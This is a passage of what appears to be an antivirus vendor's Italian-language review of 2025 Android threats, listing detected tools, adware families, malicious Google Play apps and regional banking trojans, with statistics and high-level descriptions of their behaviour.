    &lt;dt&gt;&lt;b&gt;Tool.NPMod.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite l'utility NP Manager. Questa utility contiene moduli per l'offuscamento e la protezione del codice di programmi, nonché per l'aggiramento del controllo della loro firma digitale dopo la modifica. L'offuscamento da essa aggiunto spesso viene utilizzato in malware per renderne più difficile il rilevamento e l'analisi.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Androlua&amp;lng=it"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di una serie di versioni potenzialmente pericolose di un framework specializzato per lo sviluppo di programmi Android nel linguaggio di programmazione di scripting Lua. La logica principale di applicazioni Lua è situata in script corrispondenti che sono cifrati e vengono decifrati dall'interprete prima dell'esecuzione. Spesso questo framework di default chiede l'accesso a molteplici autorizzazioni di sistema per il funzionamento, tra l'altro, per l'uso del servizio di funzioni di accessibilità di SO Android. Come risultato, gli script Lua eseguiti attraverso di esso sono in grado di effettuare varie azioni malevole in base alle autorizzazioni ricevute.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.LuckyPatcher&amp;lng=it"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.LuckyPatcher&amp;lng=it"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Utility che consente di modificare le applicazioni Android installate (creare patch per esse) al fine di modificarne la logica di funzionamento o aggirare determinate restrizioni. Ad esempio, utilizzandola, gli utenti possono tentare di disattivare il controllo dei permessi di root in programmi bancari od ottenere risorse illimitate in giochi. Per creare le patch, l'utility scarica da internet script appositamente preparati che chiunque sia interessato può creare e aggiungere a un database comune. Le funzionalità di tali script possono risultare, tra l'altro, anche malevole, pertanto, le patch create possono rappresentare un potenziale pericolo.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Piattaforma software potenzialmente pericolosa che consente alle applicazioni di avviare i file APK senza la loro installazione. Crea un ambiente di esecuzione virtuale che non influisce sul sistema operativo principale.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Packer&amp;lng=it"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Utility packer specializzata per la protezione di applicazioni Android dalla modifica e dal reverse engineering. Non è malevola, ma può essere utilizzata per la protezione di programmi sia innocui che trojan.&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;Applicazioni pubblicitarie&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;Tra i software pubblicitari, nel 2025 sono state le più diffuse le mod estranee dell'applicazione WhatsApp, rilevate come &lt;a href="https://vms.drweb-av.it/search/?q=Adware.ModAd&amp;lng=it"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;. In tali varianti è incorporata la funzionalità di apertura di link durante l'uso dell'app di messaggistica. Da questi link viene eseguito il reindirizzamento verso i siti pubblicizzati. Rispetto al 2024, la quota di &lt;a href="https://vms.drweb-av.it/search/?q=Adware.ModAd&amp;lng=it"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; del numero totale di applicazioni pubblicitarie rilevate sui dispositivi protetti è scesa dal 47,45% al 26,90%.&lt;/p&gt;

&lt;p&gt;I moduli &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Adpush&amp;lng=it"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;, che vengono incorporati in programmi Android e visualizzano notifiche pubblicitarie, si trovano alla seconda posizione, avendo aumentato l'attività nell'arco dell'anno dal 14,76% al 26,19%. La terza posizione con l'indicatore 8,88% è occupata da esemplari della famiglia &lt;b&gt;Adware.Basement&lt;/b&gt;, la cui quota è rimasta praticamente invariata rispetto all'anno precedente. Tali programmi possono visualizzare annunci pubblicitari che portano a siti malevoli.&lt;/p&gt;

&lt;p&gt;Si sono diffuse anche le famiglie di applicazioni pubblicitarie &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Airpush&amp;lng=it"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt; (il numero di rilevamenti è aumentato dal 4,35% al 5,14%), &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Fictus&amp;lng=it"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt; (una crescita dal 3,29% al 6,21%), &lt;b&gt;Adware.Youmi&lt;/b&gt; (una crescita dall'1,62% al 2,91%), nonché &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Leadbolt&amp;lng=it"&gt;&lt;b&gt;Adware.Leadbolt&lt;/b&gt;&lt;/a&gt; (una crescita dal 2,26% al 2,41%) e &lt;b&gt;Adware.Jiubang&lt;/b&gt; (una crescita dall'1,70% al 2,38%).&lt;/p&gt;

&lt;p&gt;Le dieci applicazioni pubblicitarie più diffuse rilevate su dispositivi Android nel 2025 sono:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/11_2025_adware_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/11_2025_adware_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.ModAd&amp;lng=it"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di alcune versioni modificate (mods) dell'app di messaggistica WhatsApp, nelle funzionalità delle quali è incorporato un codice per caricare i link di destinazione tramite web view durante l'utilizzo dell'app. Da questi indirizzi internet viene eseguito il reindirizzamento verso i siti pubblicizzati — ad esempio, casinò online e scommesse, siti per adulti.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Adpush&amp;lng=it"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.39.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Moduli pubblicitari che possono essere integrati in programmi Android. Visualizzano notifiche pubblicitarie che fuorviano gli utenti. Ad esempio, tali notifiche possono somigliare ai messaggi del sistema operativo. Inoltre, questi moduli raccolgono una serie di dati riservati, nonché sono in grado di scaricare altre app e avviarne l'installazione.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Applicazioni che visualizzano annunci pubblicitari indesiderati che spesso portano a siti malevoli e truffaldini. Hanno una base di codice comune con i programmi indesiderati &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Fictus&amp;lng=it"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Modulo pubblicitario che i malintenzionati incorporano in versioni clone di popolari giochi e programmi Android. Viene integrato in programmi tramite un packer specializzato net2share. Le copie di software create in questo modo vengono distribuite attraverso diversi store di app e dopo l'installazione visualizzano pubblicità indesiderate.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Airpush&amp;lng=it"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Moduli software che vengono incorporati in applicazioni Android e visualizzano le più svariate pubblicità. A seconda della versione e variante, queste possono essere notifiche, finestre a comparsa o banner pubblicitari. Tramite questi moduli, i malintenzionati spesso distribuiscono programmi malevoli invitando a installare determinati software. Inoltre, tali moduli trasmettono al server remoto varie informazioni riservate.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Youmi&amp;lng=it"&gt;&lt;b&gt;Adware.Youmi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di un modulo adware indesiderato che colloca scorciatoie pubblicitarie sulla schermata iniziale di dispostivi Android.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Jiubang.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Software pubblicitario indesiderato per dispositivi Android, che durante l'installazione di applicazioni visualizza un banner con programmi raccomandati per l'installazione.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Inmobi&amp;lng=it"&gt;&lt;b&gt;Adware.Inmobi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di alcune versioni di un SDK pubblicitario Inmobi, che sono in grado di effettuare telefonate e aggiungere eventi al calendario di dispostivi Android.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Minacce su Google Play&lt;/h3&gt;

&lt;p&gt;Nel 2025 il laboratorio antivirus dell'azienda Doctor Web ha scoperto sullo store di app Google Play oltre 180 programmi malevoli, indesiderati e pubblicitari, che in totale sono stati installati almeno 2.165.040 volte. Includevano, in particolare, le varianti diverse dei trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4213&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4215&lt;/b&gt;, che nascondevano la propria presenza sui dispositivi infetti e visualizzavano la pubblicità sopra l'interfaccia del sistema operativo e di altre applicazioni. Questi trojan venivano distribuiti sotto le apparenze di app di fotoritocco, programmi per la ripresa di foto e video e altri software.&lt;/p&gt;

&lt;div class="img img-two mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/12_Android.HiddenAds.4215_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/12_Android.HiddenAds.4215_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/13_Android.HiddenAds.4213_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/13_Android.HiddenAds.4213_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Programmi Time Shift Cam e Fusion Collage Editor erano i trojan pubblicitari &lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Sotto le spoglie dei software ufficiali dello scambio di criptovalute Dydx e delle piattaforme blockchain Raydium e Aerodrome Finance, i cybercriminali distribuivano i trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.CoinSteal&amp;lng=it"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.202&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.CoinSteal&amp;lng=it"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.203&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.CoinSteal&amp;lng=it"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.206&lt;/b&gt;, che rubavano criptovalute.&lt;/p&gt;

&lt;div class="img img-two mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/14_Android.CoinSteal.203_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/14_Android.CoinSteal.203_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/15_Android.CoinSteal.202_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/15_Android.CoinSteal.202_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;In programmi Raydium e Dydx Exchange erano nascosti i software trojan per il furto di criptovalute&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Queste applicazioni malevole suggerivano agli utenti di inserire la frase mnemonica presumibilmente per la connessione di un portafoglio crypto, in realtà però, i dati inseriti venivano trasmessi ai malintenzionati. Per confondere ancora di più le potenziali vittime, i moduli per l'inserimento di frasi mnemoniche potevano essere mascherati da richieste da altre piattaforme crypto.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/16_seed_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/16_seed_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/17_seed_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/17_seed_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;&lt;b&gt;Android.CoinSteal.206&lt;/b&gt; visualizza un modulo di phishing presumibilmente a nome dello scambio di criptovalute PancakeSwap e chiede la frase mnemonica per l'accesso al portafoglio crypto&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Durante l'anno scorso, i nostri specialisti hanno rilevato su Google Play più di 80 applicazioni malevole della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, che iscrivono gli utenti a servizi a pagamento. Venivano distribuiti sotto le vesti di software diversi, inclusi app di messaggistica, programmi per la fotografia, utility di sistema, editor di immagini e programmi per l'elaborazione di documenti.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/18_Android.Joker.2494_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/18_Android.Joker.2494_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/19_Android.Joker.2496_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/19_Android.Joker.2496_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempi di trojan &lt;b&gt;Android.Joker&lt;/b&gt; rilevati: &lt;b&gt;Android.Joker.2494&lt;/b&gt; veniva distribuito come app di messaggistica File Text Messages, e &lt;b&gt;Android.Joker.2496&lt;/b&gt; come utility Useful Cleaner per l'ottimizzazione del funzionamento dello smartphone&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I cybercriminali di nuovo distribuivano gli svariati programmi falsificazione &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, che vengono impiegati in vari schemi di frode. Il loro compito principale è caricare pagine web di destinazione. Una parte di questi trojan i malintenzionati spacciavano per software a tema finanziario. Tali programmi caricavano siti fraudolenti presumibilmente legati a investimenti e guadagno online, nonché siti di phishing. Altri programmi falsificazione &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; venivano distribuiti con il pretesto di giochi, e a determinate condizioni, potevano caricare siti di casinò online e scommesse. Abbiamo registrato in totale più di 100 tali programmi su Google Play.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/20_Android.FakeApp.1840_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/20_Android.FakeApp.1840_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/21_Android.FakeApp.1863_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/21_Android.FakeApp.1863_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempi di applicazioni falsificazione &lt;b&gt;Android.FakeApp&lt;/b&gt;. Trojan &lt;b&gt;Android.FakeApp.1863&lt;/b&gt;, nascosto nel programma TPAO, era orientato agli utenti turchi e suggeriva loro di gestire depositi e redditi. Mentre il trojan &lt;b&gt;Android.FakeApp.1840&lt;/b&gt; veniva distribuito sotto forma di gioco Pino Bounce e poteva caricare un sito di casinò online&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Gli analisti dei virus Doctor Web hanno rilevato, inoltre, un nuovo software pubblicitario indesiderato, denominato &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Adpush&amp;lng=it"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21912&lt;/b&gt;, che era nascosto nel programma Coin News Promax con informazioni su criptovalute. &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Adpush&amp;lng=it"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21912&lt;/b&gt; visualizza notifiche, al clic sulle quali viene caricato in una WebView un link impostato dal server C2.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/22_Adware.Adpush.21912_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/22_Adware.Adpush.21912_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Applicazione Coin News Promax da Google Play era il software pubblicitario &lt;b&gt;Adware.Adpush.21912&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Oltre a ciò, i nostri specialisti hanno individuato un programma indesiderato chiamato &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt; che veniva distribuito con il pretesto di un'app con il nome Zeus Jackpot Mania. Gli utenti ricevevano in esso in forma di gioco premi virtuali che quindi presumibilmente potrebbero convertire in denaro reale e prelevare dall'applicazione.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/23_Program.FakeMoney.16_1_Zeus Jackpot Mania_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/23_Program.FakeMoney.16_1_Zeus Jackpot Mania_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Programma Zeus Jackpot Mania era l'applicazione indesiderata &lt;b&gt;Program.FakeMoney.16&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Per il "prelievo" del denaro, il programma chiedeva una serie di dati, tuttavia, gli utenti non ricevevano alcun pagamento.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/24_Program.FakeMoney.16_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/24_Program.FakeMoney.16_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;&lt;b&gt;Program.FakeMoney.16&lt;/b&gt; chiede di indicare il nome completo dell'utente e informazioni sull'account bancario&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Trojan bancari&lt;/h3&gt;

&lt;p&gt;Secondo i dati delle statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel 2025 la quota dei trojan bancari del numero totale di programmi malevoli registrati è stata il 6,94%, il che è leggermente superiore al valore del 6,29% dell'anno precedente. Durante i primi tre mesi, l'attività dei trojan bancari rimaneva approssimativamente allo stesso livello, ma già all'inizio del II trimestre essa è notevolmente aumentata. Successivamente ha iniziato a diminuire gradualmente raggiungendo il minimo annuale a luglio. Da agosto il numero di rilevamenti ha ricominciato a crescere e già ad ottobre ha raggiunto il picco. Alla fine dell'anno si osservava un altro calo.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/26_banker_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/26_banker_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Nel 2025 i malintenzionati continuavano a utilizzare una serie di popolari famiglie di trojan bancari nei loro attacchi. Tra i più attivi erano i programmi malevoli &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot.Coper&amp;lng=en" target="_blank"&gt;Coper&lt;/a&gt;, &lt;b&gt;Android.BankBot.Ermac&lt;/b&gt; e alcuni altri. Inoltre, sono state rilevate nuove versioni dei trojan &lt;a href="https://vms.drweb.ru/virus/?i=29204494" target="_blank"&gt;NGate&lt;/a&gt;, che utilizzano la tecnologia NFC per il furto di denaro. Questi programmi malevoli trasmettono ai malintenzionati dati dal chip NFC dei dispositivi infetti, consentendo ai truffatori, senza ulteriore coinvolgimento degli utenti, di prelevare denaro dai conti delle vittime ai bancomat o fare acquisti utilizzando il pagamento contactless. Tra le varianti più attive erano &lt;b&gt;Android.Banker.NGate.8&lt;/b&gt;, &lt;b&gt;Android.Banker.NGate.17&lt;/b&gt;, &lt;b&gt;Android.Banker.NGate.5.origin&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;È continuata la diffusione di &lt;b&gt;Android.SpyMax&lt;/b&gt; — applicazioni malevole con funzionalità spia, basate sul codice sorgente reso pubblico del trojan RAT SpyNote. I cybercriminali le utilizzano, tra l'altro, anche come trojan bancari. Rispetto al 2024, però, l'attività di &lt;b&gt;Android.SpyMax&lt;/b&gt; è diminuita. Queste applicazioni malevole hanno rappresentato il 12,35% dei rilevamenti di trojan bancari contro l'indicatore del 32,04% dell'anno prima.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/27_Android.SpyMax_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/27_Android.SpyMax_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Nel 2025 gli utenti russi il più spesso affrontavano i vari trojan bancari che secondo la classificazione dell'azienda Doctor Web rientrano nell'ampia famiglia Mamont (&lt;b&gt;Android.Banker.790.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.Mamont.3.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.Mamont.28.origin&lt;/b&gt;). Include svariate applicazioni malevole che gli autori di virus continuano attivamente a modificare e sviluppare. Questi programmi intercettano gli SMS con codici monouso da istituzioni finanziarie e rubano i dati di carte bancarie e altre informazioni confidenziali.&lt;/p&gt;

&lt;p&gt;Durante l'anno, i nostri specialisti registravano un'attività di trojan bancari mirati agli abitanti di Uzbekistan e degli stati confinanti con esso, inclusa Armenia, Azerbaigian e Kirghizistan. Il più spesso sui dispositivi protetti venivano rilevati &lt;b&gt;Android.Banker.951.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.881.origin&lt;/b&gt; e &lt;b&gt;Android.Banker.963.origin&lt;/b&gt;, che rubano i codici SMS di verifica da istituzioni creditizie. I cybercriminali modificano di continuo tali applicazioni malevole per renderne più difficile il rilevamento. Gli utenti turchi il più spesso sono stati attaccati dai trojan bancari &lt;b&gt;Android.BankBot.Coper.12.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.5685&lt;/b&gt; e &lt;b&gt;Android.Banker.864.origin&lt;/b&gt;, che anche sono in grado di sottrarre il contenuto di messaggi SMS.&lt;/p&gt;

&lt;p&gt;Nello stesso tempo, gli abitanti di Iran dovevano affrontare i trojan &lt;b&gt;Android.BankBot.1190.origin&lt;/b&gt;, &lt;b&gt;Android.BankBot.1191.origin&lt;/b&gt; e loro varianti. Questi programmi malevoli rubano informazioni bancarie dai messaggi SMS: trovano in essi dati sulle carte bancarie, sui conti della vittima, sulla somma di denaro disponibile, sulle operazioni effettuate ecc., dopodiché inviano tali informazioni ai malintenzionati. Inoltre, raccolgono informazioni sui contatti dalla rubrica e sono in grado di inviare messaggi SMS su comando degli attaccanti.&lt;/p&gt;

&lt;p&gt;Gli abitanti di molti paesi di Asia Sudorientale e Asia Pacifico, inclusa Indonesia e Corea del Sud, venivano attaccati dal trojan &lt;b&gt;Android.BankBot.Remo.1.origin&lt;/b&gt;. Questo malware utilizza le funzioni di accessibilità per rubare dati dalle applicazioni di banche e portafogli crypto installate sui dispositivi infetti. Oltre al trojan Remo, gli utenti sudcoreani riscontavano anche i trojan &lt;b&gt;Android.BankBot.15140&lt;/b&gt;, &lt;b&gt;Android.BankBot.Ermac.6.origin&lt;/b&gt; e GoldDigger (&lt;b&gt;Android.BankBot.GoldDigger.9&lt;/b&gt;, &lt;b&gt;Android.BankBot.GoldDigger.11&lt;/b&gt;).&lt;/p&gt;

&lt;p&gt;I programmi malevoli GoldDigger venivano adoperati anche contro gli utenti indonesiani e thailandesi. E il trojan bancario &lt;b&gt;Android.BankBot.Gigabud.1.origin&lt;/b&gt; veniva utilizzato contro i clienti di istituzioni creditizie di Indonesia e Malesia. Nello stesso tempo, i malintenzionati hanno continuato ad impiegare i trojan MoqHao negli attacchi al pubblico giapponese. Si sono diffuse le varianti di MoqHao come &lt;b&gt;Android.Banker.672.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.5063&lt;/b&gt;, &lt;b&gt;Android.Banker.740.origin&lt;/b&gt; e una serie di altre.&lt;/p&gt;

&lt;p&gt;Uno dei trojan bancari mirati agli abitanti di India è stato &lt;b&gt;Android.Banker.6209&lt;/b&gt;. Il trojan imita l'aspetto esteriore di vere applicazioni bancarie al fine di rubare dati degli utenti: i loro nomi, numeri di carte bancarie e codici di sicurezza CVV. Oltre a questo, utilizza i dispositivi infetti per il mining nascosto della criptovaluta Monero. Di nuovo erano diffusi anche i trojan bancari RewardSteal, come &lt;b&gt;Android.Banker.814.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.913.origin&lt;/b&gt; e &lt;b&gt;Android.Banker.5132&lt;/b&gt;. Per il furto di dati bancari, essi si mascherano da software presumibilmente legati a istituzioni creditizie indiane: ad esempio, ICICI, SBI, Axis e PM Kisan.&lt;/p&gt;

&lt;p&gt;I proprietari di dispostivi Android brasiliani il più spesso venivano attaccati dai malware &lt;b&gt;Android.BankBot.1183.origin&lt;/b&gt;, nonché da una serie di esemplari della famiglia NGate —&lt;b&gt;Android.Banker.NGate.8&lt;/b&gt;, &lt;b&gt;Android.Banker.NGate.9&lt;/b&gt; и &lt;b&gt;Android.Banker.NGate.14&lt;/b&gt;.&lt;/p&gt;

